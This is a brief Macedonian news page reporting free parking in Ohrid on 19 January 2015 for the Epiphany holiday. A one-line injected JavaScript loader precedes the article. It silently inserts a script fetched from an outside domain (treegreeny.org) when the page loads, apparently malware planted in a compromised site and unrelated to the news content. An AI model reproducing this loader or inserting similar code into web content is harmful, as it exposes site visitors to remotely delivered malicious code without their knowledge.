;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Денес 19.01.2015 Бесплатно паркирање во Охрид -

Денес 19.01.2015 Бесплатно паркирање во Охрид

За големиот христијански празник Богојавление – Водици, на паркинзите со кои стопанисува ЈП „Билјанини извори“ паркирањето на сите возилата ќе биде бесплатно. На овај начин јавното претпријатие се приклучува кој прославата на овај голем христијански празник.

Leave a Reply

Your email address will not be published.